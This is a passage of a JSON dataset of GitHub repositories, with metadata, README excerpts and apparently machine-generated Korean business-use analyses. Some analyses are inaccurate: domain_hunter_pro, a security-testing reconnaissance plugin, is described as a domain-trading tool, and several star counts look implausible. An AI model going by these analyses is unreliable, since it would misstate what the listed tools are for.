공장, 클라우드의 컴퓨터를 웹 대시보","readme_excerpt":"[![Stale Branches](https://github.com/microsoft/azure_arc/actions/workflows/stale-branches.yml/badge.svg)](https://github.com/microsoft/azure_arc/actions/workflows/stale-branches.yml)\n\n# ⚡ Arc Jumpstart source code\n\nWelcome to the Arc Jumpstart source code repository! This repository is your go-to resource for working with and contributing to the Arc Jumpstart automation scripts and tools and acts as the backend source code repository which complements our [documentation repository](https://github.com/Azure/arc_jumpstart_docs) that eventually populates the [Arc Jumpstart](https://aka.ms/arcjumpstart) website.\n\n<p align=\"center\">\n  <img src=\"https://github.com/Azure/arc_jumpstart_docs/raw/main/img/logo/jumpstart.png\" alt=\"Arc Jumpstart logo\" width=\"320\">\n</p>\n\n**Note:** This repository does not contain the source code for the documentation of the Arc Jumpstart which can be found in another [dedicated repository](https://github.com/Azure/arc_jumpstart_docs).\n\n## 📦 What you'll find here\n\n","composite_score":0.0339,"license_safety_tag":"unknown"},{"name":"learning-zone/python-interview-questions","github_url":"https://github.com/learning-zone/python-interview-questions","stars":11,"language":"Python","license":"unknown","abandonment_months":1,"description":"# Python 면접 질문 저장소 분석\n\n## 왜 보물인가\n프로그래머 채용 시험을 준비하는 수천 명이 찾는 학습 자료로, 온라인 교육 플랫폼이나 채용 코칭 회사에 필수 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 프로그래머 입문자를 위한 채용 시험 준비 과정 콘텐츠로 월구독 서비스화\n2. **기업 채용 도구**: 중소 IT회사","readme_excerpt":"# Python Basics\n\n> *Click &#9733; if you like the project. Your contributions are heartily ♡ welcome.*\n\n<br/>\n\n## Q.What is Python?\nPython is a popular programming language. It was created by Guido van Rossum, and released in 1991.\n\nIt is used for:\n\nweb development (server-side),\n\nsoftware development,\n\nmathematics,\n\nsystem scripting.\n\n## Q.What can Python do?\nPython can be used on a server to create web applications.\nPython can be used alongside software to create workflows.\nPython can connect to database systems. It can also read and modify files.\nPython can be used to handle big data and perform complex mathematics.\nPython can be used for rapid prototyping, or for production-ready software development.\n\n## Q. How can you improve the following code?\n\n```py\nimport string\n\ni = 0\nfor letter in string.letters:\n    print(\"The letter at index %i is %s\" % (i, letter))\n    i = i + 1\n```\n\nBonus points for mentioning `enumerate` and use of `str.format`.\n\n<div align=\"right\">\n    <b><a href=\"#\">","composite_score":0.0338,"license_safety_tag":"unknown"},{"name":"zealdocs/zeal","github_url":"https://github.com/zealdocs/zeal","stars":5,"language":"C++","license":"gpl-3.0","abandonment_months":0,"description":"# Zeal 저장소 분석\n\n## 왜 보물인가\n개발자들이 필요한 프로그래밍 문서를 오프라인에서 빠르게 검색할 수 있는 도구로, 인터넷 없이도 기술 학습과 업무를 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발 학습 플랫폼 SaaS**: 부트캠프나 온라인 코딩 학원이 수강생들에게 오프라인 문서 검색 기능을 제공\n2. **기업 내부 개발 도구**: I","readme_excerpt":"# Zeal\n\n[![Changelog](https://img.shields.io/github/release/zealdocs/zeal.svg?style=flat-square)](https://github.com/zealdocs/zeal/releases)\n[![Gitter](https://img.shields.io/gitter/room/zealdocs/zeal.svg?style=flat-square)](https://gitter.im/zealdocs/zeal)\n[![IRC](https://img.shields.io/badge/chat-on%20irc-blue.svg?style=flat-square)](https://web.libera.chat/#zealdocs)\n[![Telegram Channel](https://img.shields.io/badge/follow-on%20telegram-179cde.svg?style=flat-square)](https://telegram.me/zealdocsapp)\n[![Twitter](https://img.shields.io/badge/follow-on%20twitter-1da1f2.svg?style=flat-square)](https://twitter.com/zealdocs)\n\n[![Build Check](https://img.shields.io/github/actions/workflow/status/zealdocs/zeal/build-check.yaml?style=flat-square)](https://github.com/zealdocs/zeal/actions/workflows/build-check.yaml)\n[![Coverity Scan](https://img.shields.io/coverity/scan/4271.svg?style=flat-square)](https://scan.coverity.com/projects/4271)\n\nZeal is a simple offline documentation browser inspir","composite_score":0.0336,"license_safety_tag":"restricted"},{"name":"doctrine/sql-formatter","github_url":"https://github.com/doctrine/sql-formatter","stars":5,"language":"HTML","license":"MIT","abandonment_months":2,"description":"# doctrine/sql-formatter 상용화 분석\n\n## 왜 보물인가\n데이터베이스 명령어를 읽기 쉽게 정렬해주는 도구로, 모든 데이터 기반 비즈니스에서 필수적인 기능입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 데이터 분석 대시보드나 클라우드 데이터베이스 관리 플랫폼에 내장하여 사용자가 쿼리를 쉽게 읽을 수 있도록 지원\n2. *","readme_excerpt":"# SqlFormatter\n\nA lightweight php package for formatting sql statements.\n\nIt can automatically indent and add line breaks in addition to syntax\nhighlighting.\n\n## History\n\nThis package is a fork from https://github.com/jdorn/sql-formatter\nHere is what the original History section says:\n\n> I found myself having to debug auto-generated SQL statements all the time and\n> wanted some way to easily output formatted HTML without having to include a\n> huge library or copy and paste into online formatters.\n\n> I was originally planning to extract the formatting code from PhpMyAdmin,\n> but that was 10,000+ lines of code and used global variables.\n\n> I saw that other people had the same problem and used Stack Overflow user\n> losif's answer as a starting point.  http://stackoverflow.com/a/3924147\n\n― @jdorn\n\n## Usage\n\nThe `SqlFormatter` class has a method `format` which takes an SQL string as\ninput and returns a formatted block.\n\nSample usage:\n\n```php\n<?php\nrequire_once 'vendor/autoload.php';\n\nuse Do","composite_score":0.0334,"license_safety_tag":"safe"},{"name":"NewFuture/DDNS","github_url":"https://github.com/NewFuture/DDNS","stars":7,"language":"Python","license":"MIT","abandonment_months":1,"description":"# NewFuture/DDNS 분석 보고서\n\n## 왜 보물인가\n인터넷 주소가 자주 바뀌는 소규모 회사나 개인도 자동으로 관리할 수 있는 무료 도구라서, 비용 부담 없이 안정적인 온라인 서비스를 운영할 수 있습니다.\n\n## 어디에 쓸 수 있나\n**SaaS 서비스**: 소규모 기업의 서버 주소 변경을 자동으로 감지하고 업데이트해주는 구독형 서비스\n**내부 업무","readme_excerpt":"# [<img src=\"docs/public/img/ddns.svg\" width=\"32px\" height=\"32px\"/>](https://ddns.newfuture.cc) DDNS\n\n> 自动更新 DNS 解析到本机 IP 地址，支持 IPv4/IPv6，内网/公网 IP，自动创建 DNS 记录\n\n[![GitHub](https://img.shields.io/github/license/NewFuture/DDNS?logo=github&style=flat)](https://github.com/NewFuture/DDNS)\n[![Build](https://github.com/NewFuture/DDNS/actions/workflows/build.yml/badge.svg?event=push)](https://github.com/NewFuture/DDNS/actions/workflows/build.yml)\n[![Publish](https://github.com/NewFuture/DDNS/actions/workflows/publish.yml/badge.svg)](https://github.com/NewFuture/DDNS/actions/workflows/publish.yml)\n[![Release](https://img.shields.io/github/v/release/NewFuture/DDNS?logo=github&style=flat)](https://github.com/NewFuture/DDNS/releases/latest)\n[![PyPI](https://img.shields.io/pypi/v/ddns.svg?logo=pypi&style=flat)](https://pypi.org/project/ddns/)\n[![Python Version](https://img.shields.io/pypi/pyversions/ddns.svg?logo=python&style=flat)](https://pypi.org/project/ddns/)\n[![Docker](https://img.shields.io/d","composite_score":0.0334,"license_safety_tag":"safe"},{"name":"ElectronNET/Electron.NET","github_url":"https://github.com/ElectronNET/Electron.NET","stars":6,"language":"C#","license":"mit","abandonment_months":1,"description":"# Electron.NET 분석 리포트\n\n## 왜 보물인가\n윈도우, 맥, 리눅스 등 모든 컴퓨터에서 동작하는 데스크톱 프로그램을 웹 기술(자바스크립트)로 간단히 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 디자인 도구나 영상 편집 프로그램을 모든 운영체제에서 동일하게 제공하는 데스크톱 앱\n2. **내부","readme_excerpt":"[![Electron.NET Logo](https://github.com/ElectronNET/Electron.NET/raw/main/assets/images/electron.net-logo.png)](https://github.com/ElectronNET/Electron.NET)\n\n[![donate](https://img.shields.io/badge/Donate-Donorbox-green.svg)](https://donorbox.org/electron-net) [![Gitter](https://badges.gitter.im/ElectronNET/community.svg)](https://gitter.im/ElectronNET/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge) [![Build status](https://github.com/ElectronNET/Electron.NET/actions/workflows/ci.yml/badge.svg)](https://github.com/ElectronNET/Electron.NET/actions/workflows/ci.yml)\n\n# Electron.NET Core is here!\n\n## A Complete Transformation\n\n`ElectronNET.Core` represents a fundamental modernization of Electron.NET, addressing years of accumulated pain points while preserving full API compatibility. This isn't just an update — it's a complete rethinking of how .NET developers build and debug cross-platform desktop applications with Electron.\n\nRead more: [**What's New in `ElectronNET.C","composite_score":0.0333,"license_safety_tag":"safe"},{"name":"bit4woo/domain_hunter_pro","github_url":"https://github.com/bit4woo/domain_hunter_pro","stars":8,"language":"Java","license":"unknown","abandonment_months":2,"description":"# Domain Hunter Pro 상용화 분석\n\n## 왜 보물인가\n인터넷 주소(도메인) 거래 기회를 자동으로 찾아주는 도구로, 온라인 사업을 준비하거나 확장하려는 사람들이 매번 수작업으로 하던 일을 자동화합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 도메인 투자자·사업가 대상 구독형 플랫폼 (월 $49~199)\n2. **내부 업무 도","readme_excerpt":"# domain hunter pro\n\n你还在用Excel进行目标管理吗？\n\n你还在为收集目标的信息而烦恼吗？\n\n你还在测试时不停地复制粘贴吗？\n\n那么来试试 [domain hunter pro](https://github.com/bit4woo/domain_hunter_pro) 吧！方便快捷的目标管理、自动化的信息收集、与burp无缝衔接、与外部安全工具联动...\n\n这是一个帮助 SRC白帽子、安全测试工程师提高效率的工具！\n\n我mmmark 师傅的御用工具之一！\n\n# 作者和贡献者\n\n[bit4woo](https://github.com/bit4woo)\n\nmmmark （很多核心思路都来自他宝贵的实战经验！）\n\n# 快速上手\n\n### 下载安装\n\n下载jar包 https://github.com/bit4woo/domain_hunter_pro/releases\n\n获取软件的Jar包，由于该软件是基于BurpSuite的插件程序。需要与BurpSuite一起使用。\n\n![image-20201217105403971](img/README/image-20201217105403971.png)\n\n安装后的界面效果\n\n![image-20201217110021821](img/README/image-20201217110021821.png)\n\n### 创建项目文件（SQLLITE DB）\n\n创建一个新的项目，也可以打开已有的项目文件（xxx.db）\n\n![image-20201217110750673](img/README/image-20201217110750673.png)\n\n![image-20201217110955197](img/README/image-20201217110955197.png)\n\n\n\n### 主域名管理\n\n主域名是实现目标管理的核心，所有相关域名、子域名、相似域名、邮箱地址、Java包名称都是以主域名作为依据的。比如我们以baidu.com为例\n\n![image-20201217111105540](img/README/image-20201217111105540.png)\n\n通过代理浏览器访问baidu.com，收集其流量\n\n![image-20201217111235527](img/","composite_score":0.0331,"license_safety_tag":"unknown"},{"name":"ubuntu/microk8s","github_url":"https://github.com/ubuntu/microk8s","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# Ubuntu MicroK8s 보물 분석\n\n## 왜 보물인가\n컴퓨터를 효율적으로 관리하는 작은 크기의 관리 시스템으로, 대규모 데이터센터부터 개인 서버까지 어디서나 가볍게 운영할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 서비스**: 중소 기업용 저비용 클라우드 플랫폼으로 SaaS 제공\n2. **내부 업무 도구**: 회사 내부 서버 자동화","readme_excerpt":"<img src=\"docs/images/MicroK8s-logo-RGB-2022.png\" width=\"400px;\" />\n\n[![](https://github.com/canonical/microk8s/actions/workflows/build-snap.yml/badge.svg)](https://github.com/canonical/microk8s/actions/workflows/build-snap.yml)\n[![](https://snapcraft.io/microk8s/badge.svg)](https://snapcraft.io/microk8s)\n\n<img src=\"/docs/images/certified_kubernetes_color-222x300.png\" align=\"right\" width=\"200px\">\n\n## The smallest, fastest Kubernetes\n\nSingle-package fully conformant lightweight Kubernetes that works on [42\nflavours of Linux](https://snapcraft.io/microk8s). Perfect for:\n\n- Developer workstations\n- IoT\n- Edge\n- CI/CD\n\n > Canonical might have assembled the easiest way to provision a single node Kubernetes cluster - [Kelsey Hightower](https://twitter.com/kelseyhightower/status/1120834594138406912)\n\n## Why MicroK8s?\n\n- **Small**. Developers want the smallest K8s for laptop and workstation\n  development.  MicroK8s provides a standalone K8s compatible with Azure\n  AKS, Amazon EKS, Google GKE w","composite_score":0.0329,"license_safety_tag":"safe"},{"name":"terrakok/kmm-awesome","github_url":"https://github.com/terrakok/kmm-awesome","stars":7,"language":"","license":"unknown","abandonment_months":1,"description":"# terrakok/kmm-awesome 분석\n\n## 왜 보물인가\n안드로이드와 iOS 앱을 동시에 만들 수 있는 기술에 필요한 자료와 도구들을 한 곳에 모아놓은 정보 창고입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 안드로이드/iOS 앱을 빠르게 개발해야 할 때 필요한 가이드와 도구를 구독 형태로 제공\n2. **내부 업무 도구","readme_excerpt":"# <img src=\"https://github.com/terrakok/kmp-awesome/raw/master/img/icon.svg\" width=\"30\"/> Awesome Kotlin Multiplatform\n\n<img src=\"https://github.com/terrakok/kmp-awesome/raw/master/img/multiplatform-sharing.svg\" align=\"center\" width=\"400\"/>\n\n[![Pull request](https://img.shields.io/badge/PRs-welcome-success?style=flat)](https://github.com/terrakok/kmp-awesome/pulls)\n[![Awesome](https://awesome.re/badge.svg)](https://awesome.re)\n[![GitHub Repo stars](https://img.shields.io/github/stars/terrakok/kmp-awesome?style=flat)](https://github.com/terrakok/kmp-awesome)\n[![Maven Central](https://img.shields.io/maven-central/v/org.jetbrains.kotlin/kotlin-maven-plugin.svg)](https://central.sonatype.com/search?q=g%3Aorg.jetbrains.kotlin)\n\nKotlin Multiplatform technology simplifies the development of cross-platform projects.\nIt reduces time spent writing and maintaining the same code for different platforms while retaining the flexibility and benefits of native programming.\n\n**This list contains librar","composite_score":0.0329,"license_safety_tag":"unknown"},{"name":"Arisotura/melonDS","github_url":"https://github.com/Arisotura/melonDS","stars":8,"language":"C++","license":"GPL-3.0","abandonment_months":0,"description":"# melonDS 프로젝트 분석\n\n## 왜 보물인가\nNintendo DS 게임기를 컴퓨터에서 즐길 수 있게 해주는 오픈소스 에뮬레이터로, 향수를 느끼는 게이머들과 게임 보존 커뮤니티에서 높은 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 게임 플레이 서비스**: \"클라우드로 DS 게임을 즉시 플레이\" 같은 구독형 게임 스트리밍 서비스의 핵심 ","readme_excerpt":"<p align=\"center\"><img src=\"https://raw.githubusercontent.com/melonDS-emu/melonDS/master/res/icon/melon_128x128.png\"></p>\n<h2 align=\"center\"><b>melonDS</b></h2>\n<p align=\"center\">\n<a href=\"http://melonds.kuribo64.net/\" alt=\"melonDS website\"><img src=\"https://img.shields.io/badge/website-melonds.kuribo64.net-%2331352e.svg\"></a>\n<a href=\"http://melonds.kuribo64.net/downloads.php\" alt=\"Release: 1.1\"><img src=\"https://img.shields.io/badge/release-1.1-%235c913b.svg\"></a>\n<a href=\"https://www.gnu.org/licenses/gpl-3.0\" alt=\"License: GPLv3\"><img src=\"https://img.shields.io/badge/License-GPL%20v3-%23ff554d.svg\"></a>\n<a href=\"https://kiwiirc.com/client/irc.badnik.net/?nick=IRC-Source_?#melonds\" alt=\"IRC channel: #melonds\"><img src=\"https://img.shields.io/badge/IRC%20chat-%23melonds-%23dd2e44.svg\"></a>\n<a href=\"https://discord.gg/pAMAtExcqV\" alt=\"Discord\"><img src=\"https://img.shields.io/badge/Discord-Kuribo64-7289da?logo=discord&logoColor=white\"></a>\n<br>\n<a href=\"https://github.com/melonDS-emu/","composite_score":0.0328,"license_safety_tag":"restricted"},{"name":"SeanChenxy/Hand3DResearch","github_url":"https://github.com/SeanChenxy/Hand3DResearch","stars":7,"language":"Python","license":"unknown","abandonment_months":2,"description":"# Hand3DResearch 사업화 분석\n\n## 왜 보물인가\n손 모양을 인식하고 3차원으로 재현하는 기술로, 게임·의료·가상현실 등 다양한 산업에서 수요가 높아지고 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 피트니스 앱에서 사용자의 손 동작을 실시간 인식하여 운동 자세를 평가하는 서비스\n- **내부 업무 도구**: 의료기관이","readme_excerpt":"# Recent Progress in 3D Hand Tasks ![Awesome](https://awesome.re/badge-flat.svg)\r\n\r\nA complete paper list for hand pose can be found [here](https://github.com/xinghaochen/awesome-hand-pose-estimation). This repo focuses on some subject areas, ideas, and works. Although some papers invloved do not study towards 3D hand scope, they are conceived presenting relavent and inspiring ideas. If there is any mistake or carelessness, please feel free to open an issue or send me email.\r\n\r\n\r\n<!-- @import \"[TOC]\" {cmd=\"toc\" depthFrom=1 depthTo=6 orderedList=false} -->\r\n\r\n<!-- code_chunk_output -->\r\n\r\n- [Recent Progress in 3D Hand Tasks ![Awesome](https://awesome.re/badge-flat.svg)](#recent-progress-in-3d-hand-tasks-awesomehttpsawesomerebadge-flatsvg)\n  - [Overview](#overview)\n  - [Datasets](#datasets)\n  - [Papers](#papers)\n    - [Hand Modeling](#hand-modeling)\n      - [Forward Kinematics](#forward-kinematics)\n      - [Inverse Kinematics](#inverse-kinematics)\n      - [Graph](#graph)\n      - [Transfo","composite_score":0.0328,"license_safety_tag":"unknown"},{"name":"clue/framework-x","github_url":"https://github.com/clue/framework-x","stars":14,"language":"PHP","license":"MIT","abandonment_months":2,"description":"# Framework-X 상용화 분석\n\n## 왜 보물인가\n기업들이 소프트웨어를 빠르고 쉽게 만들 수 있도록 돕는 기초 틀(프레임워크)로, 개발 시간과 비용을 크게 줄일 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 스타트업들이 자신의 웹 서비스를 빨리 출시할 수 있도록 하는 개발 플랫폼으로 월 구독료 징수\n2. **내부 업","readme_excerpt":"# Framework X\n\n[![CI status](https://github.com/clue-access/framework-x/workflows/CI/badge.svg)](https://github.com/clue-access/framework-x/actions)\n[![code coverage](https://img.shields.io/badge/code%20coverage-100%25-success)](#tests)\n[![PHPStan level](https://img.shields.io/badge/PHPStan%20level-max-success)](#tests)\n[![installs on Packagist](https://img.shields.io/packagist/dt/clue/framework-x?color=blue&label=installs%20on%20Packagist)](https://packagist.org/packages/clue/framework-x)\n\nFramework X – the simple and fast micro framework for building reactive web applications that run anywhere.\n\n* [Support us](#support-us)\n* [Quickstart](#quickstart)\n* [Documentation](#documentation)\n* [Contribute](#contribute)\n* [Tests](#tests)\n* [License](#license)\n\n## Support us\n\nWe invest a lot of time developing, maintaining and updating our awesome\nopen-source projects. You can help us sustain this high-quality of our work by\n[becoming a sponsor on GitHub](https://github.com/sponsors/clue). Spo","composite_score":0.0327,"license_safety_tag":"safe"},{"name":"home-assistant/supervisor","github_url":"https://github.com/home-assistant/supervisor","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# Home Assistant Supervisor 분석\n\n## 왜 보물인가\n집이나 사무실의 모든 전자기기(조명, 온도조절기, 보안카메라 등)를 하나의 앱으로 통합 관리할 수 있는 핵심 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **스마트홈 관리 SaaS**: 임대주택이나 오피스텔 관리사가 세입자/입주자의 전자기기를 원격으로 관리·모니터링하는 구독 서비스","readme_excerpt":"# Home Assistant Supervisor\n\n## First private cloud solution for home automation\n\nHome Assistant (former Hass.io) is a container-based system for managing your\nHome Assistant Core installation and related applications. The system is\ncontrolled via Home Assistant which communicates with the Supervisor. The\nSupervisor provides an API to manage the installation. This includes changing\nnetwork settings or installing and updating software.\n\n## Installation\n\nInstallation instructions can be found at https://home-assistant.io/getting-started.\n\n## Development\n\nFor small changes and bugfixes you can just follow this, but for significant changes open a RFC first.\nDevelopment instructions can be found [here][development].\n\n## Release\n\nReleases are done in 3 stages (channels) with this structure:\n\n1. Pull requests are merged to the `main` branch.\n2. A new build is pushed to the `dev` stage.\n3. Releases are published.\n4. A new build is pushed to the `beta` stage.\n5. The [`stable.json`][stable] file","composite_score":0.0327,"license_safety_tag":"safe"},{"name":"open-wa/wa-automate-nodejs","github_url":"https://github.com/open-wa/wa-automate-nodejs","stars":8,"language":"TypeScript","license":"NOASSERTION","abandonment_months":1,"description":"# open-wa/wa-automate-nodejs 분석 보고서\n\n## 왜 보물인가\nWhatsApp 메시지를 자동으로 보내고 관리할 수 있는 도구로, 고객 응답 자동화가 필요한 비즈니스의 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 카페나 가게가 주문 확인, 배송 알림을 WhatsApp으로 자동 발송하","readme_excerpt":"> [!WARNING]\n> By using this project you explicitly agree to the [Terms of Service](./tos.md).\n>\n> This project is unofficial and is not affiliated with WhatsApp or Meta. Use it at your own risk.\n\n> [!CAUTION]\n> This repository is currently on version 5, which is still in alpha and may have issues.\n>\n> For now, use version 4 instead unless you are explicitly testing or contributing to v5.\n>\n> The last stable version is **4.76.0**:\n>\n> ```bash\n> npx @open-wa/wa-automate@4.76.0\n> ```\n\n<div align=\"center\">\n<img src=\"https://raw.githubusercontent.com/open-wa/wa-automate-nodejs/master/resources/hotfix-logo.png\" width=\"128\" height=\"128\"/>\n\n# open-wa / wa-automate\n\n**Turn a WhatsApp account into an API, bot runtime, webhook bridge, and AI tool surface.**\n\n[![npm version](https://img.shields.io/npm/v/@open-wa/wa-automate.svg?color=green)](https://www.npmjs.com/package/@open-wa/wa-automate)\n![node](https://img.shields.io/node/v/@open-wa/wa-automate)\n[![Downloads](https://img.shields.io/npm/dm/@","composite_score":0.0325,"license_safety_tag":"unknown"},{"name":"node-nock/nock","github_url":"https://github.com/node-nock/nock","stars":8,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# node-nock/nock 자산 분석\n\n## 왜 보물인가\n웹 서비스 개발할 때 외부 서비스와의 연결을 테스트하는 과정을 자동화해주는 도구로, 개발 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **결제 연동 SaaS**: 실제 결제 서버 없이 결제 시뮬레이션으로 안정성 테스트\n2. **날씨 데이터 내부 도구**: 날씨 API 연결 부분","readme_excerpt":"# Nock\n\n[![npm](https://img.shields.io/npm/v/nock.svg)][npmjs]\n![Coverage Status](http://img.shields.io/badge/coverage-100%25-brightgreen.svg)\n[![Backers on Open Collective](https://opencollective.com/nock/backers/badge.svg)](#backers)\n[![Sponsors on Open Collective](https://opencollective.com/nock/sponsors/badge.svg)](#sponsors)\n\n[npmjs]: https://www.npmjs.com/package/nock\n\nHTTP server mocking and expectations library for Node.js\n\nNock can be used to test modules that perform HTTP requests in isolation.\n\nFor instance, if a module performs HTTP requests to a CouchDB server or makes HTTP requests to the Amazon API, you can test that module in isolation.\n\n**Table of Contents**\n\n<!-- toc -->\n\n- [How does it work?](#how-does-it-work)\n- [Install](#install)\n  - [Node version support](#node-version-support)\n- [Usage](#usage)\n  - [READ THIS! - About interceptors](#read-this---about-interceptors)\n  - [Specifying hostname](#specifying-hostname)\n  - [Specifying path](#specifying-path)\n  - [Specif","composite_score":0.0324,"license_safety_tag":"safe"},{"name":"gilesknap/gphotos-sync","github_url":"https://github.com/gilesknap/gphotos-sync","stars":5,"language":"Python","license":"apache-2.0","abandonment_months":2,"description":"# gphotos-sync 저장소 분석\n\n## 왜 보물인가\n구글 포토에 저장된 모든 사진을 자동으로 컴퓨터에 백업하는 도구로, 클라우드 서비스의 의존도를 줄이고 개인 데이터를 통제할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **사진 백업 SaaS**: 개인 사용자를 위한 구독형 자동 백업 서비스로 월 이용료 모델로 운영\n2. **기업 데이터 관리","readme_excerpt":"So long and thanks for all the contributions!\n=============================================\n\nThis project was archived on Oct 4th 2024\n-----------------------------------------\nFor the details behind this decision please see https://github.com/gilesknap/gphotos-sync-discussion/discussions/1\n\n---------------------------------------------------------------\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n.\n---------------------------------------------------------------\n\n\nGoogle Photos Sync (gphotos-sync)\n=================================\n\n|code_ci| |docs_ci| |coverage| |pypi_version| |license|\n\nGoogle Photos Sync is a backup tool for your Google Photos cloud storage.\n\n============== ==============================================================\nPyPI           ``pip install gphotos-sync``\nSource code    https://github.com/gilesknap/gphotos-sync\nDocumentation  https://gilesknap.github.io/gphotos-sync\nReleases       https://github.c","composite_score":0.0323,"license_safety_tag":"safe"},{"name":"square/moshi","github_url":"https://github.com/square/moshi","stars":9,"language":"Kotlin","license":"apache-2.0","abandonment_months":0,"description":"# Square Moshi 분석 보고서\n\n## 왜 보물인가\n데이터를 다양한 형식으로 변환해주는 도구로, 웹서비스나 앱을 만드는 사람들의 작업 시간을 크게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **API 판매**: 여러 형식의 데이터를 자동 변환해주는 API 서비스로 월 구독료 수취\n2. **SaaS 서비스**: 중소 기업의 데이터 통합 플랫폼에 내장","readme_excerpt":"Moshi\n=====\n\nMoshi is a modern JSON library for Android, Java and Kotlin. It makes it easy to parse JSON into Java and Kotlin\nclasses:\n\n_Note: The Kotlin examples of this README assume use of either Kotlin code gen or `KotlinJsonAdapterFactory` for reflection. Plain Java-based reflection is unsupported on Kotlin classes._\n\n<details>\n  <summary>Java</summary>\n\n```java\nString json = ...;\n\nMoshi moshi = new Moshi.Builder().build();\nJsonAdapter<BlackjackHand> jsonAdapter = moshi.adapter(BlackjackHand.class);\n\nBlackjackHand blackjackHand = jsonAdapter.fromJson(json);\nSystem.out.println(blackjackHand);\n```\n</details>\n\n<details open>\n  <summary>Kotlin</summary>\n\n```kotlin\nval json: String = ...\n\nval moshi: Moshi = Moshi.Builder().build()\nval jsonAdapter: JsonAdapter<BlackjackHand> = moshi.adapter<BlackjackHand>()\n\nval blackjackHand = jsonAdapter.fromJson(json)\nprintln(blackjackHand)\n```\n</details>\n\nAnd it can just as easily serialize Java or Kotlin objects as JSON:\n\n<details>\n    <summary>Jav","composite_score":0.0321,"license_safety_tag":"safe"},{"name":"tomusdrw/rust-web3","github_url":"https://github.com/tomusdrw/rust-web3","stars":5,"language":"Rust","license":"MIT","abandonment_months":1,"description":"# rust-web3 프로젝트 분석\n\n## 왜 보물인가\n암호화폐 거래소나 블록체인 서비스를 만들려는 개발자들이 쉽게 사용할 수 있는 연결 도구를 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **암호화폐 지갑 SaaS**: 사용자가 웹에서 직접 암호화폐를 관리하고 거래할 수 있는 서비스 구축\n2. **블록체인 모니터링 API**: 기업이 암호화폐 거래 내역","readme_excerpt":"# web3\n\nEthereum JSON-RPC multi-transport client.\nRust implementation of Web3.js library.\n\n[![Build Status][ci-image]][ci-url] [![Crates.io](https://img.shields.io/crates/v/web3)](https://crates.io/crates/web3)\n\n[ci-image]: https://github.com/tomusdrw/rust-web3/workflows/Compilation%20and%20Testing%20Suite/badge.svg\n[ci-url]: https://github.com/tomusdrw/rust-web3/actions?query=workflow%3A%22Compilation+and+Testing+Suite%22\n[docs-rs-badge]: https://docs.rs/web3/badge.svg\n[docs-rs-url]: https://docs.rs/web3\n\nDocumentation: [crates.io][docs-rs-url]\n\n## Status\n\nNote this package is **barely maintained** and I am looking for an active maintainer (see #664).\nIf you are starting a new project, I'd recommend choosing https://github.com/gakonst/ethers-rs instead.\n\n## Usage\n\nFirst, add this to your `Cargo.toml`:\n\n```toml\n[dependencies]\nweb3 = \"0.19.0\"\n```\n\n## Example\n```rust\n#[tokio::main]\nasync fn main() -> web3::Result<()> {\n    let transport = web3::transports::Http::new(\"http://localhost:854","composite_score":0.032,"license_safety_tag":"safe"},{"name":"LinusDierheimer/fastfetch","github_url":"https://github.com/LinusDierheimer/fastfetch","stars":5,"language":"C","license":"MIT","abandonment_months":0,"description":"# fastfetch 저장소 분석\n\n## 왜 보물인가\n컴퓨터의 사양과 성능 정보를 빠르게 조회할 수 있는 경량 도구로, 시스템 관리자와 개발자가 필요로 하는 필수 유틸리티입니다.\n\n## 어디에 쓸 수 있나\n1. **IT 자산 관리 SaaS**: 기업의 모든 직원 컴퓨터 사양을 자동으로 수집하고 관리하는 클라우드 대시보드\n2. **원격 기술지원 플랫폼**: ","readme_excerpt":"# Fastfetch\n\n[![GitHub Workflow Status (with event)](https://img.shields.io/github/actions/workflow/status/fastfetch-cli/fastfetch/ci.yml)](https://github.com/fastfetch-cli/fastfetch/actions)\n[![GitHub license](https://img.shields.io/github/license/fastfetch-cli/fastfetch)](https://github.com/fastfetch-cli/fastfetch/blob/dev/LICENSE)\n[![GitHub contributors](https://img.shields.io/github/contributors/fastfetch-cli/fastfetch)](https://github.com/fastfetch-cli/fastfetch/graphs/contributors)\n[![GitHub top language](https://img.shields.io/github/languages/top/fastfetch-cli/fastfetch?logo=c&label=)](https://github.com/fastfetch-cli/fastfetch/blob/dev/CMakeLists.txt#L5)\n[![GitHub commit activity (branch)](https://img.shields.io/github/commit-activity/m/fastfetch-cli/fastfetch)](https://github.com/fastfetch-cli/fastfetch/commits)  \n[![homebrew downloads](https://img.shields.io/homebrew/installs/dm/fastfetch?logo=homebrew)](https://formulae.brew.sh/formula/fastfetch#default)\n[![GitHub all relea","composite_score":0.0319,"license_safety_tag":"safe"},{"name":"lesismal/nbio","github_url":"https://github.com/lesismal/nbio","stars":7,"language":"Go","license":"MIT","abandonment_months":2,"description":"# nbio 저장소 분석\n\n## 왜 보물인가\n웹 서비스를 빠르고 안정적으로 만드는 데 필요한 기초 부품이라, 수많은 인터넷 서비스 개발자들에게 유용하게 쓰일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 많은 사용자가 동시에 접속해도 느려지지 않는 채팅, 